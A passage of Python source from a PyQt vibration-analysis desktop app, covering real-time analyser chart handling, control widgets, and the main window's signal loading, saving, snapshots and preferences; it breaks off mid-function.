avg_plot_name = f"{plot_name_prefix}{sig.measurement_name}:{sig.axis}:avg"
self.__manage_plot_item(avg_plot_name, data[-1].idx, sig.measurement_name, sig.axis, x_data, y_avg, avg_pen)
def __manage_plot_item(self, name, idx, measurement_name, axis, x_data, y_data, pen_args):
'''
Creates or updates a plot item or removes it.
:param name: plot name.
:param idx: the underlying signal index.
:param measurement_name: the originating measurement.
:param axis: the axis for which this data is for.
:param x_data: x data.
:param y_data: y data.
:param pen_args: the args to describe the pen
'''
if y_data is not None:
logger.debug(f"Tick {axis} {idx} {np.min(y_data):.4f} - {np.max(y_data):.4f} - {len(y_data)} ")
self.__show_or_remove_analysis(name, measurement_name, axis, x_data, y_data, pen_args if pen_args else {})
elif name in self.__plots:
self.__remove_named_plot(name)
def __remove_named_plot(self, name):
'''
Eliminates the named plot.
:param name: the name.
'''
self.__chart.removeItem(self.__plots[name])
del self.__plots[name]
del self.__plot_data[name]
self.__legend.removeItem(name)
self.__remove_from_selector(self.__ref_curve_selector, name)
self.__remove_from_selector(self.__show_value_selector, name)
@staticmethod
def __remove_from_selector(selector, name):
'''
Removes the named item from the selector.
:param selector: the selector.
:param name: the name.
'''
idx = selector.findText(name)
if idx > -1:
if selector.currentIndex() == idx:
selector.setCurrentIndex(0)
selector.removeItem(idx)
def __show_or_remove_analysis(self, plot_name, measurement_name, axis, x_data, y_data, pen_args):
'''
If the series should be visible, creates or updates a PlotItem with the x and y data.
If the series should not be visible, removes the PlotItem if it is displayed atm.
:param plot_name: plot name.
:param measurement_name: the measurement name.
:param axis: the axis.
:param x_data: x data.
:param y_data: y data.
:param pen_args: the description of the pen.
'''
if self.is_visible(measurement=measurement_name, axis=axis) is True:
y = smooth_savgol(x_data, y_data, wl=self.__sg_wl, poly=self.__sg_poly)[
1] if self.__smooth is True else y_data
self.__render_or_update(pen_args, plot_name, x_data, y, axis=axis)
elif plot_name in self.__plots:
self.__remove_named_plot(plot_name)
def __render_or_update(self, pen_args, plot_name, x_data, y, axis=None):
'''
actually updates (or creates) the plot.
:param pen_args: the pen args.
:param plot_name: the plot name.
:param x_data: x.
:param y: y.
:param axis: the axis.
'''
self.__plot_data[plot_name] = x_data, y
if self.__ref_curve is not None:
ref_plot_name = None
if self.__ref_curve in self.__known_measurements:
if axis is not None:
ref_plot_name = f"{self.__ref_curve}:{axis}"
elif self.__ref_curve in self.__plot_data:
ref_plot_name = self.__ref_curve
if ref_plot_name in self.__plot_data:
ref_plot_data = self.__plot_data[ref_plot_name]
x_data, y = self.__normalise(ref_plot_data[0], ref_plot_data[1], x_data, y)
if plot_name in self.__plots:
self.__plots[plot_name].setData(x_data, y)
self.__v_line.label.valueChanged()
else:
if self.__legend is None:
self.__legend = self.__chart.addLegend(offset=(-15, -15))
pen = pg.mkPen(color=self.__colour_provider.get_colour(plot_name), width=2, **pen_args)
self.__plots[plot_name] = self.__chart.plot(x_data, y, pen=pen, name=plot_name)
self.__ensure_curve_in_selector(self.__ref_curve_selector, plot_name)
self.__ensure_curve_in_selector(self.__show_value_selector, plot_name, include_measurement=False)
def __ensure_curve_in_selector(self, selector, plot_name, include_measurement=True):
''' Ensures the name is in the combo '''
if selector.findText(plot_name) == -1:
if include_measurement is True:
m_name = next((m for m in self.__known_measurements if plot_name.startswith(f"{m}:")), None)
if m_name is not None:
if selector.findText(m_name) == -1:
selector.addItem(m_name)
selector.addItem(plot_name)
@staticmethod
def __normalise(ref_x, ref_y, data_x, data_y):
'''
Creates a new dataset which shows the delta between the data and the reference.
:param ref_x: the ref x values.
:param ref_y: the ref y values.
:param data_x: the data x values.
:param data_y: the data y values.
:return: the resulting normalised x and y values.
'''
ref_step = ref_x[1] - ref_x[0]
data_step = data_x[1] - data_x[0]
if ref_step == data_step:
count = min(ref_x.size, data_x.size) - 1
new_x = data_x[0:count]
new_y = data_y[0:count] - ref_y[0:count]
else:
if data_x[-1] == ref_x[-1]:
# same max so upsample to the more precise one
if data_step < ref_step:
new_x = data_x
new_y = data_y - np.interp(data_x, ref_x, ref_y)[1]
else:
new_x = ref_x
new_y = data_y - np.interp(ref_x, data_x, data_y)[1]
elif data_x[-1] > ref_x[-1]:
# restrict the self data range to the limits of the target
capped_x = data_x[data_x <= ref_x[-1]]
capped_y = data_y[0:capped_x.size]
if data_step < ref_step:
new_x = capped_x
new_y = capped_y - np.interp(capped_x, ref_x, ref_y)[1]
else:
new_x = ref_x
new_y = np.interp(ref_x, capped_x, capped_y)[1] - ref_y
else:
# restrict the target data range to the limits of the self
capped_x = ref_x[ref_x <= data_x[-1]]
capped_y = ref_y[0:capped_x.size]
if ref_step < data_step:
new_x = data_x
new_y = data_y - np.interp(data_x, capped_x, capped_y)[1]
else:
new_x = capped_x
new_y = np.interp(ref_x, data_x, data_y)[1] - ref_y
return new_x, new_y
class ChunkCalculator:
def __init__(self, min_nperseg, stride):
'''
Creates a new calculator which produces chunks and min_nperseg size sliding forward in stride steps
'''
self.last_idx = {}
self.min_nperseg = min_nperseg
self.stride = stride
def reset(self, name):
if name in self.last_idx:
del self.last_idx[name]
def recalc(self, name, data):
last_processed_idx = int(max(self.last_idx.get(name, 0), data[:, 0][0]))
last_sample_idx = np.argmax(data[:, 0] == last_processed_idx) if last_processed_idx > 0 else 0
fresh_samples = data.shape[0] - last_sample_idx
chunks = []
if last_processed_idx == 0:
if fresh_samples >= self.min_nperseg:
chunks.append(data[0:self.min_nperseg])
last_sample_idx = self.min_nperseg - 1
fresh_samples -= self.min_nperseg
if fresh_samples > self.stride:
while True:
next_idx = last_sample_idx + self.stride + 1
if next_idx > data.shape[0]:
break
start = max(0, next_idx - self.min_nperseg)
chunk = data[start:next_idx]
if chunk.shape[0] == self.min_nperseg:
chunks.append(chunk)
last_sample_idx = next_idx - 1
if chunks:
self.last_idx[name] = chunks[-1][:, 0][-1]
return chunks
return None
class CurveAwareLabel:
def __init__(self):
self.curve = None
self.__no_curve_format = '[{value:0.1f} Hz]'
self.__curve_format = '[{value:0.1f} Hz / {mag:0.1f} dB{accel}]'
self.__accel_format = '{sep}{accel:0.3f}{suffix}{unit}'
def format(self, value):
if self.curve is None:
return self.__no_curve_format.format(value=value)
else:
mag = self.__get_y_pos(value)
if mag == -1:
accel = ''
else:
sep = ' / '
unit = 'G'
suffix = ''
accel = 10.0 ** (mag / 20) * REF_ACCELERATION_IN_G
if accel <= 0.1:
accel *= 1000.0
suffix = 'm'
accel = self.__accel_format.format(suffix=suffix, unit=unit, sep=sep, accel=accel)
return self.__curve_format.format(value=value, mag=mag, accel=accel)
def __get_y_pos(self, hz):
try:
x, y = self.curve.getData()
return y[np.argmax(x >= hz)]
except:
return -1.0
class AccelerationLabel:
def __init__(self):
self.__format = '[{value:0.1f} dB / {accel:0.3f} {suffix}G]'
def format(self, value):
accel = 10.0 ** (value / 20) * REF_ACCELERATION_IN_G
if accel <= 0.1:
accel *= 1000.0
suffix = 'm'
else:
suffix = ''
return self.__format.format(value=value, accel=accel, suffix=suffix)
class ControlUi:
def __init__(self, parent_layout, rtaTab, prefs):
self.parent_layout = parent_layout
self.rta_tab = rtaTab
self.preferences = prefs
self.rta_controls_layout = FlowLayout()
self.rta_controls_layout.setObjectName("rtaControlsLayout")
self.rta_view_label = QtWidgets.QLabel(self.rta_tab)
self.rta_view_label.setObjectName("rtaViewLabel")
self.rta_controls_layout.addWidget(self.rta_view_label)
self.rta_view = QtWidgets.QComboBox(self.rta_tab)
self.rta_view.setObjectName("rtaView")
self.rta_view.addItem("")
self.rta_view.addItem("")
self.rta_view.addItem("")
self.rta_controls_layout.addWidget(self.rta_view)
self.hold_time_label = QtWidgets.QLabel(self.rta_tab)
self.hold_time_label.setObjectName("holdTimeLabel")
self.rta_controls_layout.addWidget(self.hold_time_label)
self.hold_secs = QtWidgets.QDoubleSpinBox(self.rta_tab)
self.hold_secs.setDecimals(1)
self.hold_secs.setMinimum(0.5)
self.hold_secs.setMaximum(30.0)
self.hold_secs.setSingleStep(0.1)
self.hold_secs.setProperty("value", self.preferences.get(RTA_HOLD_SECONDS))
self.hold_secs.setObjectName("holdSecs")
self.rta_controls_layout.addWidget(self.hold_secs)
self.show_live = QtWidgets.QPushButton(self.rta_tab)
self.show_live.setCheckable(True)
self.show_live.setChecked(True)
self.show_live.setObjectName("showLive")
self.rta_controls_layout.addWidget(self.show_live)
self.show_peak = QtWidgets.QPushButton(self.rta_tab)
self.show_peak.setCheckable(True)
self.show_peak.setObjectName("showPeak")
self.rta_controls_layout.addWidget(self.show_peak)
self.show_average = QtWidgets.QPushButton(self.rta_tab)
self.show_average.setCheckable(True)
self.show_average.setObjectName("showAverage")
self.rta_controls_layout.addWidget(self.show_average)
self.show_target = QtWidgets.QPushButton(self.rta_tab)
self.show_target.setCheckable(True)
self.show_target.setObjectName("showTarget")
self.rta_controls_layout.addWidget(self.show_target)
self.target_adjust_db = QtWidgets.QDoubleSpinBox(self.rta_tab)
self.target_adjust_db.setDecimals(1)
self.target_adjust_db.setMinimum(-150.0)
self.target_adjust_db.setMaximum(150.0)
self.target_adjust_db.setSingleStep(0.1)
self.target_adjust_db.setObjectName("targetAdjust")
self.rta_controls_layout.addWidget(self.target_adjust_db)
self.smooth_rta = QtWidgets.QPushButton(self.rta_tab)
self.smooth_rta.setCheckable(True)
self.smooth_rta.setObjectName("smoothRta")
self.rta_controls_layout.addWidget(self.smooth_rta)
self.sg_window_length = QtWidgets.QSpinBox(self.rta_tab)
self.sg_window_length.setMinimum(1)
self.sg_window_length.setMaximum(201)
self.sg_window_length.setSingleStep(2)
self.sg_window_length.setProperty("value", self.preferences.get(RTA_SMOOTH_WINDOW))
self.sg_window_length.setObjectName("sgWindowLength")
self.sg_window_length.lineEdit().setReadOnly(True)
self.sg_window_length.setToolTip('Higher values = smoother curves')
self.rta_controls_layout.addWidget(self.sg_window_length)
self.sg_poly_order = QtWidgets.QSpinBox(self.rta_tab)
self.sg_poly_order.setMinimum(1)
self.sg_poly_order.setMaximum(11)
self.sg_poly_order.setProperty("value", self.preferences.get(RTA_SMOOTH_POLY))
self.sg_poly_order.setObjectName("sgPolyOrder")
self.sg_poly_order.setToolTip('Lower values = smoother curves')
self.rta_controls_layout.addWidget(self.sg_poly_order)
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.rta_controls_layout.addItem(spacerItem5)
self.toggle_crosshairs = QtWidgets.QPushButton(self.rta_tab)
self.toggle_crosshairs.setCheckable(True)
self.toggle_crosshairs.setObjectName("toggleCrosshairs")
self.rta_controls_layout.addWidget(self.toggle_crosshairs)
self.save_config = QtWidgets.QToolButton(self.rta_tab)
self.save_config.setObjectName("saveConfig")
self.save_config.clicked.connect(self.__save_config)
self.rta_controls_layout.addWidget(self.save_config)
self.export_frd = QtWidgets.QToolButton(self.rta_tab)
self.export_frd.setObjectName("exportFRD")
self.rta_controls_layout.addWidget(self.export_frd)
self.parent_layout.addLayout(self.rta_controls_layout, 0, 0, 1, 1)
_translate = QtCore.QCoreApplication.translate
self.rta_view_label.setText(_translate("MainWindow", "View"))
self.rta_view.setItemText(0, _translate("MainWindow", "avg"))
self.rta_view.setItemText(1, _translate("MainWindow", "peak"))
self.rta_view.setItemText(2, _translate("MainWindow", "psd"))
self.hold_time_label.setText(_translate("MainWindow", "Hold Time:"))
self.hold_secs.setToolTip(_translate("MainWindow", "Seconds of data to include in peak calculation"))
self.hold_secs.setSuffix(_translate("MainWindow", " s"))
self.show_live.setText(_translate("MainWindow", "Live"))
self.show_peak.setText(_translate("MainWindow", "Peak"))
self.show_average.setText(_translate("MainWindow", "Average"))
self.show_target.setText(_translate("MainWindow", "Target"))
self.target_adjust_db.setSuffix(_translate("MainWindow", " dB"))
self.target_adjust_db.setToolTip('Adjusts the level of the target curve')
self.smooth_rta.setText(_translate("MainWindow", "Smooth"))
self.toggle_crosshairs.setText(_translate("MainWindow", "Move Crosshairs"))
self.toggle_crosshairs.setShortcut(_translate("MainWindow", "Ctrl+T"))
self.toggle_crosshairs.setToolTip('Press CTRL+T to toggle')
self.save_config.setIcon(qta.icon('fa5s.save'))
self.save_config.setShortcut(_translate("MainWindow", "Ctrl+Shift+S"))
self.save_config.setToolTip('Press CTRL+SHIFT+S to save the current config')
self.export_frd.setText(_translate("MainWindow", "..."))
self.export_frd.setIcon(qta.icon('fa5s.file-export'))
def __save_config(self):
self.preferences.set(RTA_HOLD_SECONDS, self.hold_secs.value())
self.preferences.set(RTA_SMOOTH_WINDOW, self.sg_window_length.value())
self.preferences.set(RTA_SMOOTH_POLY, self.sg_poly_order.value())
```
#### File: main/python/qvibe.py
```python
import gzip
import json
import logging
import os
import sys
import time
from model.charts import ColourProvider
from model.measurements import MeasurementStore
from model.rta import RTA
from model.save import SaveChartDialog, SaveWavDialog
from model.spectrogram import Spectrogram
from model.vibration import Vibration
os.environ['PYQTGRAPH_QT_LIB'] = 'PyQt5'
os.environ['QT_API'] = 'pyqt5'
# if sys.platform == 'win32' and getattr(sys, '_MEIPASS', False):
# Workaround for PyInstaller being unable to find Qt5Core.dll on PATH.
# See https://github.com/pyinstaller/pyinstaller/issues/4293
# os.environ['PATH'] = sys._MEIPASS + os.pathsep + os.environ['PATH']
import pyqtgraph as pg
import qtawesome as qta
import numpy as np
from qtpy import QtCore
from qtpy.QtCore import QTimer, QSettings, QThreadPool, QUrl, QTime, QRunnable, QThread
from qtpy.QtGui import QIcon, QFont, QDesktopServices
from qtpy.QtWidgets import QMainWindow, QApplication, QErrorMessage, QMessageBox, QFileDialog
from common import block_signals, ReactorRunner, np_to_str, parse_file, bump_tick_levels
from model.preferences import SYSTEM_CHECK_FOR_BETA_UPDATES, SYSTEM_CHECK_FOR_UPDATES, SCREEN_GEOMETRY, \
SCREEN_WINDOW_STATE, PreferencesDialog, Preferences, BUFFER_SIZE, ANALYSIS_RESOLUTION, CHART_MAG_MIN, \
CHART_MAG_MAX, keep_range, CHART_FREQ_MIN, CHART_FREQ_MAX, SNAPSHOT_GROUP
from model.checker import VersionChecker, ReleaseNotesDialog
from model.log import RollingLogger, to_millis
from model.preferences import RECORDER_TARGET_FS, RECORDER_TARGET_SAMPLES_PER_BATCH, RECORDER_TARGET_ACCEL_ENABLED, \
RECORDER_TARGET_ACCEL_SENS, RECORDER_TARGET_GYRO_ENABLED, RECORDER_TARGET_GYRO_SENS, RECORDER_SAVED_IPS
from ui.app import Ui_MainWindow
from model.recorders import RecorderStore, RecorderConfig
logger = logging.getLogger('qvibe')
class QVibe(QMainWindow, Ui_MainWindow):
snapshot_saved = QtCore.Signal(int, str, object)
def __init__(self, app, prefs, parent=None):
super(QVibe, self).__init__(parent)
self.logger = logging.getLogger('qvibe')
self.app = app
self.preferences = prefs
# basic setup and version checking
if getattr(sys, 'frozen', False):
self.__style_path_root = sys._MEIPASS
else:
self.__style_path_root = os.path.dirname(__file__)
self.__version = '0.0.0-alpha.1'
v_path = os.path.abspath(os.path.join(self.__style_path_root, 'VERSION'))
try:
with open(v_path) as version_file:
self.__version = version_file.read().strip()
except:
logger.exception(f"Unable to read {v_path}")
global_thread_pool = QThreadPool.globalInstance()
global_thread_pool.setMaxThreadCount(QThread.idealThreadCount() + 4)
if self.preferences.get(SYSTEM_CHECK_FOR_UPDATES):
global_thread_pool.start(VersionChecker(self.preferences.get(SYSTEM_CHECK_FOR_BETA_UPDATES),
self.__alert_on_old_version,
self.__alert_on_version_check_fail,
self.__version))
# UI initialisation
self.setupUi(self)
# run a twisted reactor as its responsiveness is embarrassingly better than QTcpSocket
from twisted.internet import reactor
self.__reactor = reactor
runner = ReactorRunner(self.__reactor)
global_thread_pool.reserveThread()
global_thread_pool.start(runner)
self.app.aboutToQuit.connect(runner.stop)
# core domain stores
self.__timer = None
self.__start_time = None
self.__target_config = self.__load_config()
self.__display_target_config()
self.__measurement_store = MeasurementStore(self.measurementLayout, self.measurementBox, self.bufferSize,
self.preferences, self.__target_config)
self.__measurement_store.signals.data_changed.connect(self.__display_measurement)
self.__measurement_store.signals.measurement_added.connect(self.__display_measurement)
self.__measurement_store.signals.visibility_changed.connect(self.__set_visible_measurements)
self.__recorder_store = RecorderStore(self.__target_config,
self.recordersLayout,
self.centralwidget,
self.__reactor,
self.__measurement_store)
self.__recorder_store.signals.on_status_change.connect(self.__handle_recorder_connect_event)
target_resolution = f"{self.preferences.get(ANALYSIS_RESOLUTION)} Hz"
self.resolutionHz.setCurrentText(target_resolution)
# menus
self.log_viewer = RollingLogger(self.preferences, parent=self)
self.actionShow_Logs.triggered.connect(self.log_viewer.show_logs)
self.action_Preferences.triggered.connect(self.show_preferences)
self.actionSave_Chart.triggered.connect(self.export_chart)
self.actionExport_Wav.triggered.connect(self.export_wav)
# buffer
self.bufferSize.setValue(self.preferences.get(BUFFER_SIZE))
# magnitude range
self.magMin.setValue(self.preferences.get(CHART_MAG_MIN))
self.magMax.setValue(self.preferences.get(CHART_MAG_MAX))
def keep_min_mag_range():
keep_range(self.magMin, self.magMax, 20)
self.magMin.valueChanged['int'].connect(lambda v: keep_min_mag_range())
self.magMax.valueChanged['int'].connect(lambda v: keep_min_mag_range())
# frequency range
self.freqMin.setValue(self.preferences.get(CHART_FREQ_MIN))
self.freqMax.setValue(self.preferences.get(CHART_FREQ_MAX))
def keep_min_freq_range():
keep_range(self.freqMin, self.freqMax, 20)
self.freqMin.valueChanged['int'].connect(lambda v: keep_min_freq_range())
self.freqMax.valueChanged['int'].connect(lambda v: keep_min_freq_range())
# charts
colour_provider = ColourProvider()
self.__analysers = {
0: Vibration(self.liveVibrationChart, self.preferences, self.targetSampleRate, self.fps, self.actualFPS,
self.resolutionHz, self.targetAccelSens, self.bufferSize, self.vibrationAnalysis,
self.leftMarker, self.rightMarker, self.timeRange, self.zoomInButton, self.zoomOutButton,
self.findPeaksButton, colour_provider),
1: RTA(self.rtaLayout, self.rtaTab, self.rtaChart, self.preferences, self.targetSampleRate,
self.resolutionHz, self.fps, self.actualFPS, self.magMin, self.magMax, self.freqMin, self.freqMax,
self.refCurve, self.showValueFor, self.__measurement_store.signals, colour_provider),
2: Spectrogram(self.spectrogramView, self.preferences, self.targetSampleRate, self.fps, self.actualFPS,
self.resolutionHz, self.bufferSize, self.magMin, self.magMax, self.freqMin, self.freqMax,
self.visibleCurves, self.__measurement_store),
}
self.__start_analysers()
self.set_visible_chart(self.chartTabs.currentIndex())
self.applyTargetButton.setIcon(qta.icon('fa5s.check', color='green'))
self.resetTargetButton.setIcon(qta.icon('fa5s.undo'))
self.visibleCurves.selectAll()
# load saved recorders
saved_recorders = self.preferences.get(RECORDER_SAVED_IPS)
warn_on_no_recorders = False
if saved_recorders is not None:
self.__recorder_store.load(saved_recorders.split('|'))
else:
warn_on_no_recorders = True
# show preferences if we have no IPs
if warn_on_no_recorders is True:
result = QMessageBox.question(self,
'No Recorders',
f"No qvibe-recorders have been added. \n\nUse the preferences screen to add then.\n\nWould you like to add one now?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if result == QMessageBox.Yes:
self.show_preferences()
self.saveSnapshotButton.setIcon(qta.icon('fa5s.save'))
self.saveSnapshotButton.clicked.connect(self.__save_snapshot)
self.zoomInButton.setIcon(qta.icon('fa5s.compress-arrows-alt'))
self.zoomOutButton.setIcon(qta.icon('fa5s.expand-arrows-alt'))
self.loadMeasurementButton.setIcon(qta.icon('fa5s.folder-open'))
self.actionSave_Signal.triggered.connect(self.__save_signal)
self.actionLoad_Signal.triggered.connect(self.__load_signal)
self.loadMeasurementButton.clicked.connect(self.__load_signal)
self.connectAllButton.clicked.connect(self.__recorder_store.connect)
self.disconnectAllButton.clicked.connect(self.__recorder_store.disconnect)
self.snapshot_saved.connect(self.__add_snapshot)
self.__measurement_store.load_snapshots()
def __set_visible_measurements(self, measurement):
'''
Propagates the visible measurements to the charts.
'''
keys = self.__measurement_store.get_visible_measurements()
for c in self.__analysers.values():
c.set_visible_measurements(keys)
def __display_measurement(self, measurement):
'''
Updates the charts with the data from the current measurement.
:param measurement: the measurement.
'''
if measurement.visible is True:
if measurement.latest_data is not None:
for c in self.__analysers.values():
# TODO must unwrap
c.accept(measurement.key, measurement.data, measurement.idx)
else:
logger.info(f"Hiding {measurement}")
def __save_snapshot(self):
''' Triggers the snapshot save job. '''
runner = SnapshotSaver(int(self.snapSlotSelector.currentText()), self.preferences,
lambda: self.__capture_snap(convert=False), self.__measurement_store,
self.snapshot_saved)
QThreadPool.globalInstance().start(runner)
def __add_snapshot(self, id, ip, data):
self.__measurement_store.add_snapshot(id, ip, data)
def __save_signal(self):
''' Saves the current data to a file. '''
dat = self.__capture_snap()
if len(dat.keys()) > 0:
file_name = QFileDialog(self).getSaveFileName(self, 'Save Signal', f"signal.qvibe", "QVibe Signals (*.qvibe)")
file_name = str(file_name[0]).strip()
if len(file_name) > 0:
with gzip.open(file_name, 'wb+') as outfile:
outfile.write(json.dumps(dat).encode('utf-8'))
self.statusbar.showMessage(f"Saved to {file_name}")
else:
msg_box = QMessageBox()
msg_box.setText('No data has been recorded')
msg_box.setIcon(QMessageBox.Warning)
msg_box.setWindowTitle('Nothing to Save')
msg_box.exec()
def __capture_snap(self, convert=True):
''' Snaps the available data into for saving. '''
return {k: np_to_str(v) if convert is True else v for k, v in self.__measurement_store.snap_rta().items()}
def __load_signal(self):
'''
Loads a new signal (replacing any current data if required).
'''
parsers = {'qvibe': self.__parse_qvibe}
name, data = parse_file('Signal (*.qvibe)', 'Load Signal', parsers)
if name is not None:
self.statusbar.showMessage(f"Loaded {name}")
for d in data:
self.__measurement_store.append(name, *d)
@staticmethod
def __parse_qvibe(file_name):
'''
Parses a qvibe file.
:param file_name: the file name.
:return: the measurements to load
'''
vals = []
with gzip.open(file_name, 'r') as infile:
dat = json.loads(infile.read().decode('utf-8'))
if dat is not None and len(dat.keys()) > 0:
for ip, data_txt in dat.items():
import io
vals.append([ip, np.loadtxt(io.StringIO(data_txt), dtype=np.float64, ndmin=2)])
return os.path.basename(file_name)[0:-6], vals
return None, None
def reset_recording(self):
'''
Wipes all data from the recorders and the charts.
'''
self.__measurement_store.remove_rta()
self.__recorder_store.reset()
for c in self.__analysers.values():
c.reset()
def __start_analysers(self):
for a in self.__analysers.values():
logger.info(f"Starting processor for {a.__class__.__name__}")
QThreadPool.globalInstance().reserveThread()
a.processor.start()
def stop_processor():
logger.info(f"Stopping processor for {a.__class__.__name__}")
a.processor.stop()
QThreadPool.globalInstance().releaseThread()
logger.info(f"Stopped processor for {a.__class__.__name__}")
self.app.aboutToQuit.connect(stop_processor)
logger.info(f"Started processor for {a.__class__.__name__}")
def __handle_recorder_connect_event(self, ip, connected):
''' reacts to connection status changes.'''
any_connected = self.__recorder_store.any_connected()
self.fps.setEnabled(not any_connected)
self.bufferSize.setEnabled(not any_connected)
if any_connected is True:
self.__on_start_recording()
else:
self.__on_stop_recording()
def __on_start_recording(self):
'''
Starts the data collection timer.
'''
if self.__timer is None:
self.__timer = QTimer()
self.__timer.timeout.connect(self.__collect_signals)
logger.info(f"Starting data collection timer at {self.fps.value()} fps")
self.__start_time = time.time() * 1000
self.__timer.start(1000.0 / self.fps.value())
self.resetButton.setEnabled(False)
def __on_stop_recording(self):
if self.__timer is not None:
logger.info('Stopping data collection timer')
self.__timer.stop()
self.resetButton.setEnabled(True)
def __collect_signals(self):
''' collects the latest signal and pushes it into the analysers. '''
elapsed = round((time.time() * 1000) - self.__start_time)
new_time = QTime(0, 0, 0, 0).addMSecs(elapsed)
self.elapsedTime.setTime(new_time)
for recorder_name, signal, idx, errored in self.__recorder_store.snap():
if len(signal) > 0:
if errored is True:
msg_box = QMessageBox()
msg_box.setText(f"{recorder_name} has overflowed, data will be unreliable \n\n If this occurs repeatedly, try increasing batch size or reducing sample rate via the Sensor Config panel")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setWindowTitle('Overflow')
msg_box.exec()
self.__measurement_store.append('rta', recorder_name, signal, idx)
def update_target(self):
''' updates the current target config from the UI values. '''
self.__target_config.fs = self.targetSampleRate.value()
self.__target_config.samples_per_batch = self.targetBatchSize.value()
self.__target_config.accelerometer_enabled = self.targetAccelEnabled.isChecked()
self.__target_config.accelerometer_sens = int(self.targetAccelSens.currentText())
self.__target_config.gyro_enabled = self.targetGyroEnabled.isChecked()
self.__target_config.gyro_sens = int(self.targetGyroSens.currentText())
self.freqMax.setMaximum(int(self.__target_config.fs/2))
def __load_config(self):
''' loads a config object from the preferences store '''
config = RecorderConfig()
config.fs = self.preferences.get(RECORDER_TARGET_FS)
config.samples_per_batch = self.preferences.get(RECORDER_TARGET_SAMPLES_PER_BATCH)
config.accelerometer_enabled = self.preferences.get(RECORDER_TARGET_ACCEL_ENABLED)
config.accelerometer_sens = self.preferences.get(RECORDER_TARGET_ACCEL_SENS)
config.gyro_enabled = self.preferences.get(RECORDER_TARGET_GYRO_ENABLED)
config.gyro_sens = self.preferences.get(RECORDER_TARGET_GYRO_SENS)
return config
def __display_target_config(self):
''' updates the displayed target config '''
with block_signals(self.targetSampleRate):
self.targetSampleRate.setValue(self.__target_config.fs)
with block_signals(self.targetBatchSize):
self.targetBatchSize.setValue(self.__target_config.samples_per_batch)
with block_signals(self.targetAccelEnabled):
self.targetAccelEnabled.setChecked(self.__target_config.accelerometer_enabled)
with block_signals(self.targetAccelSens):
self.targetAccelSens.setCurrentText(str(self.__target_config.accelerometer_sens))
with block_signals(self.targetGyroEnabled):
self.targetGyroEnabled.setChecked(self.__target_config.gyro_enabled)
with block_signals(self.targetGyroSens):
self.targetGyroSens.setCurrentText(str(self.__target_config.gyro_sens))
def reset_target(self):
''' resets the target config from preferences. '''
self.__target_config = self.__load_config()
self.__display_target_config()
def apply_target(self):
''' saves the target config to the preferences. '''
self.preferences.set(RECORDER_TARGET_FS, self.__target_config.fs)
self.preferences.set(RECORDER_TARGET_SAMPLES_PER_BATCH, self.__target_config.samples_per_batch)
self.preferences.set(RECORDER_TARGET_ACCEL_ENABLED, self.__target_config.accelerometer_enabled)
self.preferences.set(RECORDER_TARGET_ACCEL_SENS, self.__target_config.accelerometer_sens)
self.preferences.set(RECORDER_TARGET_GYRO_ENABLED, self.__target_config.gyro_enabled)
self.preferences.set(RECORDER_TARGET_GYRO_SENS, self.__target_config.gyro_sens)
self.__recorder_store.target_config = self.__target_config
self.__measurement_store.target_config = self.__target_config
def set_buffer_size(self, val):
self.preferences.set(BUFFER_SIZE, val)
def set_visible_chart(self, idx):
for c_idx, c in self.__analysers.items():
c.visible = (idx == c_idx)
def set_visible_curves(self):
'''
Propagates the visible axes to the charts.
'''
visible = [c.text() for c in self.visibleCurves.selectedItems()]
for c in self.__analysers.values():
c.set_visible_axes(visible)
def export_chart(self):
'''
Saves the currently selected chart to a file.
'''
idx = self.chartTabs.currentIndex()
chart = None
if idx == 0:
chart = self.liveVibrationChart
elif idx == 1:
chart = self.rtaChart
elif idx == 2:
chart = self.spectrogramView
if chart is not None:
dialog = SaveChartDialog(self, self.__analysers[idx].__class__.__name__, chart, self.statusbar)
dialog.exec()
def export_wav(self):
''' Saves data from a recorder to a file. '''
if len(self.__measurement_store) > 0:
dialog = SaveWavDialog(self,
self.preferences,
self.__measurement_store,
self.targetSampleRate.value(),
int(self.targetAccelSens.currentText()),
self.statusbar)
dialog.exec()
def show_release_notes(self):
''' Shows the release notes '''
QThreadPool.globalInstance().start(VersionChecker(self.preferences.get(SYSTEM_CHECK_FOR_BETA_UPDATES),
self.__alert_on_old_version,
self.__alert_on_version_check_fail,
self.__version,
signal_anyway=True))
@staticmethod
def show_help():
''' Opens the user guide in a browser '''
QDesktopServices.openUrl(QUrl('https://qvibe.readthedocs.io/en/latest'))
@staticmethod
def __alert_on_version_check_fail(message):
'''
Displays an alert if the version check fails.
:param message: the message.
'''
msg_box = QMessageBox()
msg_box.setText(message)
msg_box.setIcon(QMessageBox.Warning)
msg_box.setWindowTitle('Unable to Complete Version Check')
msg_box.exec()
def __alert_on_old_version(self, versions, issues):
''' Presents a dialog if there is a new version available. '''
ReleaseNotesDialog(self, versions, issues).exec()
def setupUi(self, main_window):
super().setupUi(self)
geometry = self.preferences.get(SCREEN_GEOMETRY)
if geometry is not None:
self.restoreGeometry(geometry)
else:
screen_geometry = self.app.desktop().availableGeometry()
if screen_geometry.height() < 800:
self.showMaximized()
window_state = self.preferences.get(SCREEN_WINDOW_STATE)
if window_state is not None:
self.restoreState(window_state)
def closeEvent(self, *args, **kwargs):
'''
Saves the window state on close.
:param args:
:param kwargs:
'''
self.preferences.set(SCREEN_GEOMETRY, self.saveGeometry())
self.preferences.set(SCREEN_WINDOW_STATE, self.saveState())
super().closeEvent(*args, **kwargs)
self.app.closeAllWindows()
def show_preferences(self):
'''
Shows the preferences dialog.
'''
PreferencesDialog(self.preferences, self.__style_path_root, self.__recorder_store, self.__analysers[2], parent=self).exec()
self.__analysers[1].reload_target()
def show_about(self):
msg_box = QMessageBox()
msg_box.setText(
f"<a href='https://github.com/3ll3d00d/qvibe-analyser'>QVibe Analyser</a> v{self.__version} by 3ll3d00d")
msg_box.setIcon(QMessageBox.Information)
msg_box.setWindowTitle('About')
msg_box.exec()
class SnapshotSaver(QRunnable):
def __init__(self, id, preferences, capturer, store, signal):
super().__init__()
self.__id = id
self.__preferences = preferences
self.__capturer = capturer
self.__store = store
self.__signal = signal
def run(self):
'''
Saves the snapshot to preferences.
'''
start = time.time()
dat = self.__capturer()
logger.info(f"Captured in {to_millis(start, time.time())}ms")
prefs = []
if len(dat.keys()) > 0:
for ip, v in dat.items():
prefs.append(SetPreference(self.__preferences, f"{SNAPSHOT_GROUP}/{self.__id}/{ip}", v))
self.__signal.emit(self.__id, ip, v)
for p in prefs:
